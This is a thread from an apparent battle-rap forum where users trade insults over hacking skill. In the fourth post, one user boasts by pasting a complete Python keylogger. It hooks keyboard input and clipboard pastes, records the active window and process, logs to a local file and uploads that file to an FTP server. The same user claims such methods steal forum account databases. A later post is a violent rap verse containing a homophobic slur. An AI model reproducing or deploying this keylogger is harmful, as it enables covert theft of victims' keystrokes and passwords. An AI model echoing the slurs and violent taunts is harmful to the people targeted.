![]() |
|
![]() |
#1 | |
(ง'̀-'́)ง
Join Date: Nov 2015
Posts: 15,844
Battle Record: 52-28
Accomplishments -50+ wins
Champed -Summer Classic VIII
-Netcees Battle League
-BA Picture
-BA TagTeam
-Fight Night Cypher I
-Fight Night XXXV
-Key Grand Prix 2018 1/2
Rep Power: 85899406 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]()
Lol you would flex a dirty cow script
Fuckin script kiddie
__________________
Quote:
|
|
![]() |
![]() |
![]() |
#2 | |
_Al_GO_RYTHMIC
Join Date: May 2013
Posts: 644
Battle Record: 1-3
Rep Power: 0 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() Quote:
I was just giving you something you could relate tool... and obviously I was right tool lol Yeah thats why my name is scripter youre my kiddies Yall are nothing but a bunch of posers. I bet it took you awhile to even figure out what it was lol
__________________
http://www.youtube.com/user/toadill Ⓖⓔⓣ ⓘⓝ ⓣⓗⓔ ⓑⓞⓦⓛ I CAN’T LIVE WITHOUT ╔══════╦═╗╔═╦═══╦═╦═══╗ ║░╔╗╔╗░║░║║░║╚══╣░║░╔═╝ ║░║╚╝║░║░╚╝░╠══╗║░║░╚═╗ ╚═╝░░╚═╩════╩═══╩═╩═══╝ ¸.•*¨*•♫♪¸.•*¨*•♫♪¸.•*¨*•♫♪¸.•*¨*•♫♪ ◕MUSIC◕LOVE◕LIVE◕LAUGH◕ ☯█▄█ █ █▀█ █▄█ █▀█ █▀█ ♬ ♬█▀█ █ █▀▀ █▀█ █▄█ █▀▀ ☯ ❤ ♡ ❤ ♡ ❤♡ ❤ ♡ ❤ ♡ ❤ ♡ ❤♡ Last edited by Scripter; 01-19-2020 at 07:13 AM. |
|
![]() |
![]() |
![]() |
#3 | |
_Al_GO_RYTHMIC
Join Date: May 2013
Posts: 644
Battle Record: 1-3
Rep Power: 0 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() Quote:
and now we all know who gives the best head in this piece...
__________________
http://www.youtube.com/user/toadill Ⓖⓔⓣ ⓘⓝ ⓣⓗⓔ ⓑⓞⓦⓛ I CAN’T LIVE WITHOUT ╔══════╦═╗╔═╦═══╦═╦═══╗ ║░╔╗╔╗░║░║║░║╚══╣░║░╔═╝ ║░║╚╝║░║░╚╝░╠══╗║░║░╚═╗ ╚═╝░░╚═╩════╩═══╩═╩═══╝ ¸.•*¨*•♫♪¸.•*¨*•♫♪¸.•*¨*•♫♪¸.•*¨*•♫♪ ◕MUSIC◕LOVE◕LIVE◕LAUGH◕ ☯█▄█ █ █▀█ █▄█ █▀█ █▀█ ♬ ♬█▀█ █ █▀▀ █▀█ █▄█ █▀▀ ☯ ❤ ♡ ❤ ♡ ❤♡ ❤ ♡ ❤ ♡ ❤ ♡ ❤♡ |
|
![]() |
![]() |
![]() |
#4 | |
_Al_GO_RYTHMIC
Join Date: May 2013
Posts: 644
Battle Record: 1-3
Rep Power: 0 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() Quote:
https://drive.google.com/open?id=1jH...rmqUXNIGa6uXEn See this is very common in things like BB forums, this is how they steal every account in your database. wanna ca che me outside lmfao? Im sorry youre use to stuff more like this lol Code:
from ctypes import * import pythoncom import pyHook import win32clipboard from ftplib import FTP import threading user32 = windll.user32 kernel32 = windll.kernel32 psapi = windll.psapi current_window = None try: f=open("C:\loggy\out.txt","r") except: f=open("C:\loggy\out.txt","a+") f.close() #send current recorded file def send(): global swit swit=1 while(swit): try: ft = FTP('10.42.0.1') ft.login('l','f') filename="sent.txt" fn=open("C:\loggy\out.txt","r") ft.storbinary('STOR '+filename,fn) ft.quit() fn.close() swit=0 except: swit=1 thr = threading.Thread(target=send) thr.start() def get_current_process(): f=open("C:\loggy\out.txt","a+") # get a handle to the fore ground window hwnd = user32.GetForegroundWindow() # find the process ID pid = c_ulong(0) user32.GetWindowThreadProcessId(hwnd,byref(pid)) # store the current process ID process_id = "%d" % pid.value # grab the executable executable = create_string_buffer("\x00" * 512) h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid) psapi.GetModuleBaseNameA(h_process,None,byref(executable),512) # now read its title window_title = create_string_buffer("\x00" * 512) length = user32.GetWindowTextA(hwnd, byref(window_title), 512) # print out the header if we're in the right process print f.write("[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)) print f.close() # close handles kernel32.CloseHandle(hwnd) kernel32.CloseHandle(h_process) def KeyStroke(event): global current_window # check to see if target changed windows if event.WindowName != current_window: current_window = event.WindowName get_current_process() f=open("C:\loggy\out.txt","a+") # if they passed a standard key if event.Ascii > 32 and event.Ascii < 127: f.write(chr(event.Ascii)) print chr(event.Ascii), else: # if [Ctrl-V], get the value on the clipboard if event.Key == "V": win32clipboard.OpenClipboard() pasted_value = win32clipboard.GetClipboardData() win32clipboard.CloseClipboard() f.write(pasted_value) #print "[PASTE] - %s" % (pasted_value), else: if event.Key=="Space": f.write(' ') if event.Key=="Return": f.write('\n') if event.Key=="back": f.write('\b') if event.Key=="Up": f.write("") if event.Key=="Down": f.write("") if event.Key=="Left": f.write("") if event.Key=="Right": f.write("") if event.Key=="Lcontrol": f.write("[Ctrl]") print "[%s]" % event.Key, # pass execution to next hook registered f.close() return True # create and register a hook manager kl = pyHook.HookManager() kl.KeyDown = KeyStroke # register the hook and executne forever kl.HookKeyboard() pythoncom.PumpMessages() f.close()
__________________
http://www.youtube.com/user/toadill Ⓖⓔⓣ ⓘⓝ ⓣⓗⓔ ⓑⓞⓦⓛ I CAN’T LIVE WITHOUT ╔══════╦═╗╔═╦═══╦═╦═══╗ ║░╔╗╔╗░║░║║░║╚══╣░║░╔═╝ ║░║╚╝║░║░╚╝░╠══╗║░║░╚═╗ ╚═╝░░╚═╩════╩═══╩═╩═══╝ ¸.•*¨*•♫♪¸.•*¨*•♫♪¸.•*¨*•♫♪¸.•*¨*•♫♪ ◕MUSIC◕LOVE◕LIVE◕LAUGH◕ ☯█▄█ █ █▀█ █▄█ █▀█ █▀█ ♬ ♬█▀█ █ █▀▀ █▀█ █▄█ █▀▀ ☯ ❤ ♡ ❤ ♡ ❤♡ ❤ ♡ ❤ ♡ ❤ ♡ ❤♡ Last edited by Scripter; 01-19-2020 at 07:25 AM. |
|
![]() |
![]() |
![]() |
#5 | |
_Al_GO_RYTHMIC
Join Date: May 2013
Posts: 644
Battle Record: 1-3
Rep Power: 0 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
![]() Quote:
mother fucker better shut the fuck up better take a knee you're bitch made dull fuck get all cut switch blade all in gut twisting till hes on the pavement bleed like a stuck pig cut his head off from on his knees the katanna shraded make him look like cottage cheese youll stop hate an see you got no point like without A to B retarded fuck I could be there like a paper tree unbound an free but you still ain't shaking me quaking I'm breaking a @Habitat you're like a bad habit that keeps on coming back an that be all bat so I guess what you drop is all that Guano come see me mono a mono Ill leave you lay their be no tomorrow soft as some pussies I always go hard though im with the bars while they go with the borrow without their own brain so they always do follow I'm like straight grain and they're nothing they're hollow when they're a sip I'm the whole fucking bottle Hey can you check my Spleth smell like some troglodytes having sex and some other shit I cant even put in text Zuo talking sum sit I just hear it less like some real dog shit flow heater breath he thinks hes the best but should be a guest guess he thought he wouldn't be the next fucking faggot you go ahead now eat a dick you're on that trapeze you don't need a net feed him to lions his hand feet and neck an they spit him all out they ain't eating dick I'm robbing the hood they're the merry men I like the women they stare at men Bags on their heads they're all sharing in hey its caring man... piled in caravan they don't mind they all share a hand like its marry man her five sisters their all pairing them
__________________
http://www.youtube.com/user/toadill Ⓖⓔⓣ ⓘⓝ ⓣⓗⓔ ⓑⓞⓦⓛ I CAN’T LIVE WITHOUT ╔══════╦═╗╔═╦═══╦═╦═══╗ ║░╔╗╔╗░║░║║░║╚══╣░║░╔═╝ ║░║╚╝║░║░╚╝░╠══╗║░║░╚═╗ ╚═╝░░╚═╩════╩═══╩═╩═══╝ ¸.•*¨*•♫♪¸.•*¨*•♫♪¸.•*¨*•♫♪¸.•*¨*•♫♪ ◕MUSIC◕LOVE◕LIVE◕LAUGH◕ ☯█▄█ █ █▀█ █▄█ █▀█ █▀█ ♬ ♬█▀█ █ █▀▀ █▀█ █▄█ █▀▀ ☯ ❤ ♡ ❤ ♡ ❤♡ ❤ ♡ ❤ ♡ ❤ ♡ ❤♡ Last edited by Scripter; 01-19-2020 at 01:46 PM. |
|
![]() |
![]() |
![]() |
Thread Tools | |
Display Modes | |
|
|